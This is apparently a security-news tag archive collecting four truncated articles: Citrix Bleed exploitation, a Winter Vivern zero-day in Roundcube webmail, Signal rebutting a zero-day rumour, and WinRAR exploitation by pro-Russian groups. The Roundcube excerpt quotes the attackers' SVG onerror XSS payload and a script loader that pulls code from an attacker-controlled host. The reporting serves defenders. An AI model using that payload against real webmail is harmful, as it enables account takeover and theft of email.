Tag Archive for: Vulnerability

“This vulnerability is now under mass exploitation.” Citrix Bleed bug bites hard

/in


“This vulnerability is now under mass exploitation.” Citrix Bleed bug bites hard

Getty Images

A vulnerability that allows attackers to bypass multifactor authentication and access enterprise networks using hardware sold by Citrix is under mass exploitation by ransomware hackers despite a patch being available for three weeks.

Citrix Bleed, the common name for the vulnerability, carries a severity rating of 9.4 out of a possible 10, a relatively high designation for a mere information-disclosure bug. The reason: the information disclosed can include session tokens, which the hardware assigns to devices that have already successfully provided credentials, including those providing MFA. The vulnerability, tracked as CVE-2023-4966 and residing in Citrix’s NetScaler Application Delivery Controller and NetScaler Gateway, has been under active exploitation since August. Citrix issued a patch on October 10.

Repeat: This is not a drill

Attacks have only ramped up recently, prompting security researcher Kevin Beaumont on Saturday to declare: “This vulnerability is now under mass exploitation.” He went on to say, “From talking to multiple organizations, they are seeing widespread exploitation.”

He said that as of Saturday, he had found an estimated 20,000 instances of exploited Citrix devices where session tokens had been stolen. He said his estimate was based on running a honeypot of servers that masquerade as vulnerable Netscaler devices to track opportunistic attacks on the Internet. Beaumont then compared those results with other data, including some provided by Netflow and the Shodan search engine.

Meanwhile, GreyNoise, a security company that also deploys honeypots, was showing exploits for CVE-2023-4966 coming from 135 IP addresses when this post went live on Ars. That’s a 27-fold increase from the five IPs spotted GreyNoise saw five days ago.

The most recent numbers available from security organization Shadowserver showed that there were roughly 5,500 unpatched devices. Beaumont has acknowledged that the estimate is at odds with his estimate…

Source…

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail

/in


After reading the technical details about this zero-day that targeted governmental entities and a think tank in Europe and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Jump to:

Technical details about this cyberattack exploiting a 0day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A

figure A ESET Roundcube.
Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, a SVG tag contains a base64-encoded malicious payload; this is hidden for the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg"> <image href="http://www.bing.com/news/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The goal of the malicious code is to trigger the onerror attribute by using an invalid URL in the x parameter.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher could establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to ” … properly sanitize the malicious SVG…

Source…

Signal debunks online rumours of zero-day security vulnerability

/in


Over the weekend rumours circulated on social networks of an unpatched security hole in the Signal messaging app that could allow a remote hacker to seize control of your smartphone.

The rumours, which rapidly spread further than the cybersecurity community into the wider public, claimed that the Signal encrypted messaging app contained a flaw related to its “Generate Link Previews” feature that could be exploited by hackers.

As someone once said, a lie can travel halfway around the world before the truth has got its boots on. And the situation is even worse in the 21st century, where anyone has the power to post a claim on Twitter, and watch it be retweeted and reshared thousands and thousands of times before anyone takes the time to ask a difficult question.

Some people did bother to respond to the rumours, asking for more details or a source that would confirm there was an issue. Which seems quite reasonable.  After all, an encrypted messaging app like Signal is used by privacy-conscious folks who want to keep their communications secret.

However, in the threads I saw online, anyone asking for more details of the so-called vulnerability were fobbed off with “I heard it from a trusted source” or vague references to unnamed individuals within the US government.

In short, there were no real details of a zero-day vulnerability having been found in Signal at all.

And the idea that the link preview feature of Signal might be linked to the alleged vulnerability seemed unlikely.

Although it’s true that in the past other messaging apps have been found to reveal a user’s location through preview links, it isn’t the case with Signal.

Signal generates link previews (when the feature is enabled) before the link is sent to the other Signal user – not after.

In other words, disabling “link previews” in Signal (the advice being given in the erroneous warnings posted on social media) only prevents creation of link previews on your device, you are still able to receive them from others.

Earlier today, Signal posted a message on Twitter stating that it had seen no evidence that the vulnerability was real.

It went on to say that it had “checked with people across US Government, since the copy-paste report…

Source…

Pro-Russian Hackers Exploiting Recent WinRAR Vulnerability in New Campaign

/in


Oct 16, 2023NewsroomVulnerability / Hacking

WinRAR Vulnerability

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.

“The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as CVE-2023-38831,” Cluster25 said in a report published last week.

The archive contains a booby-trapped PDF file that, when clicked, causes a Windows Batch script to be executed, which launches PowerShell commands to open a reverse shell that gives the attacker remote access to the targeted host.

Also deployed is a PowerShell script that steals data, including login credentials, from the Google Chrome and Microsoft Edge browsers. The captured information is exfiltrated via a legitimate web service webhook[.]site.

Cybersecurity

CVE-2023-38831 refers to a high-severity flaw in WinRAR that allows attackers to execute arbitrary code upon attempting to view a benign file within a ZIP archive. Findings from Group-IB in August 2023 disclosed that the bug had been weaponized as a zero-day since April 2023 in attacks targeting traders.

The development comes as Google-owned Mandiant charted Russian nation-state actor APT29’s “rapidly evolving” phishing operations targeting diplomatic entities amid an uptick in tempo and an emphasis on Ukraine in the first half of 2023.

The substantial changes in APT29’s tooling and tradecraft are “likely designed to support the increased frequency and scope of operations and hinder forensic analysis,” the company said, and that it has “used various infection chains simultaneously across different operations.”

Some of the notable changes include the use of compromised WordPress sites to host first-stage payloads as well as additional obfuscation and anti-analysis components.

AT29, which has also been linked to cloud-focused exploitation, is one of the many activity clusters originating from Russia that have singled out Ukraine following the onset of the war early last year.

In July 2023, the Computer Emergency Response Team of Ukraine…

Source…